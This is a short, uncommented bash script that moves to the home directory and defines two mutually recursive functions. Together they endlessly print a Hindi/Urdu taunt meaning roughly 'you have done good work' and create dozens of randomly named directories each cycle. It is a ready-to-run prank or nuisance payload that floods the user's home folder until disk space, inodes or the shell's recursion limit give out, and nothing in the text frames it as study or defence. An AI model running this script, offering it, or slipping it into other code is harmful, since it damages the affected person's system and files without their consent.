cd ~
h () {
	printf "\n\n \033[91m Tumne achha kam kiya hai\n\n"
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	s
	}
	s () {
		mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	mkdir $RANDOM$RANDOM$RANDOM$RANDOM
	h
	}
	s
